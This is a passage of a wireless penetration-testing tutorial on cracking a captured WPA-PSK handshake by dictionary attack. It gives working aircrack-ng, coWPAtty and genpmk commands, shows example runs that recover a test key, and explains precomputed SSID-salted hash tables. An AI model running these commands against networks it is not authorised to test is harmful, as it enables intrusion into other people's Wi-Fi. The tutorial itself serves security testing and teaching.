Performing the Crack
The Wi-Fi Alliance was wise to implement an eight character minimum for WPA-PSK. Making the key that long essentially renders brute force methods useless. This is because the number of possible typeable character combinations for keys of an eight character length is just above six quadrillion (that's 948 or about 6 x 1015).
My poor little laptop can only crunch about 35 hashes a second, so it would take me about five-and-a-half million years (I'm not kidding here either, I did the math!) to create a hash table for an eight character hash table or to test all possible combinations when brute-forcing a key.
And what's more, since the hash is salted with the SSID of the AP, that hash table I just spent five million years creating, would be good only against APs with that exact SSID. So, clearly we're not going to be brute-forcing any WPA keys anytime soon.
What we can do, however, is limit the list of possible passphrases by making educated guesses, compute the hashes of those guesses and check them against our captured key. This technique is referred to as a dictionary attack.
BackTrack v2 comes bundled with a good offering of simple wordlists, as well as four lists of passwords common in the '90s, reverse-sorted by occurrence (more common passwords are at the top, less common passwords are at the bottom). The lists seem to be missing from Backtrack v3, but there are plenty of wordlists around the 'net.
Using the wordlists in Backtrack version 2, we can mount a dictionary attack on our captured WPA handshake using either aircrack-ng or coWPAtty. Aircrack-ng runs much faster on my attacking system (testing 3740 keys took 35 seconds), and has native optimization for multiple processors. coWPAtty, on the other hand, runs much slower (testing the same 3740 keys took almost 2 minutes) and can accept hash files precomputed by genpmk.
Start a dictionary attack against a WPA key with the following:
aircrack-ng -e AP_SID -w dictionary_file capture_file
Example (BackTrack v3):
aircrack-ng -e snb -w /pentest/wireless
Aircrack-ng shows the hex hashes of the keys as it tries them, which is nice since some attacks can take a long time. Figure 8 shows that Aircrack-ng took 35 seconds to find the test key "dictionary".
Figure 8: Aircrack-ng, Key Found!
First move into the cowpatty directory, either by selecting it from the menu or by changing to /pentest/wireless/cowpatty-4.0. Then run:
./cowpatty -s AP_SID -f dictionary_file -r capture_file
./cowpatty -s snb -f dict -r Kismet-Jan-15-2008-1.dump
coWPAtty doesn't say much about its run-time status, but prints updates every thousand keys. Figure 9 shows that coWPAtty took a little over two minutes to recover the test key "dictionary".
Figure 9: coWPAtty, Key Found!
Alternately, coWPAtty can use a precomputed hash file to attack a WPA key. Precomputed hash files use a technique similar to Rainbow Tables allowing you to trade the amount of time required to crack a given key for hash file size (and precomputation time).
Hashes are paired with their plain text precursor allowing the engine to simply look up the captured WPA key hash and read off its corresponding plain text key. Since WPA keys are salted, this technique only works against AP's with the same SSID used to compute the table.
Hash tables can be very effective but require disk space to store the tables that can get rather large, quickly. Even with these limitations, the Church of WiFi has computed hash tables for the 1000 most common SSID's against one million common passphrases.
You can generate a hash table from within the cowpatty directory with coWPAtty's genpmk:
./genpmk -s AP_SID -f dictionary_file -d hash_output_file
./genpmk -s snb -f dict -d dict_hash
Figure 10: genpmk Hash Table Generation
Now, using the newly created hash table, the crack takes only a fraction of a second (0.11 to be precise). This is just shy of 1/1100th the time it took when not using a hash table.
./cowpatty -s AP_SID -d hash_output_file -r capture_file
./cowpatty -s snb -d dict_hash -r Kismet-Jan-15-2008-1.dump